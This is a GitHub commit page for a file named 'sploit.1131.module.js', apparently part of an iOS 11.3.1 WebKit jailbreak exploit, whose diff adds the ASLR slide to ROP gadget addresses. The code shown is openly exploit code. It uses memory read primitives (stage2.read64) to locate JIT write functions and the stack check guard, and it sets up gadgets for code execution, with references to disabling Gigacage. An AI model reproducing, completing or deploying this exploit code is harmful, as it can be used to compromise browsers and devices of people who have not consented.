Skip to content

Commit

Permalink
Fixed bug, added aslr slide to gadgets
Browse files Browse the repository at this point in the history
  • Loading branch information
MTJailed authored Jun 24, 2018
1 parent 3eb0ebc commit a0ebd42
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions modules/sploit.1131.module.js
Original file line number Diff line number Diff line change
Expand Up @@ -266,9 +266,9 @@ var pwn = function() {
jitWriteSeparateHeapsFunction = stage2.read64(_off.jit_writeseperateheaps_func + slide)
useFastPermisionsJITCopy = stage2.read64(_off.usefastpermissions_jitcopy + slide)
ptr_stack_check_guard = _off.ptr_stack_check_guard + slide;
pop_x8 = _off.modelio_popx8;
pop_x2 = _off.coreaudio_popx2;
linkcode_gadget = _off.linkcode_gadget;
pop_x8 = _off.modelio_popx8 + slide;
pop_x2 = _off.coreaudio_popx2 + slide;
linkcode_gadget = _off.linkcode_gadget + slide;

if(verbosity >= VERBOSITY_HIGH) {
print('disablePrimitiveGigacage @ ' + hex(disablePrimitiveGigacage)
Expand Down Expand Up @@ -369,4 +369,4 @@ var wk113go = function() {
}
});
});
};
};

0 comments on commit a0ebd42

Please sign in to comment.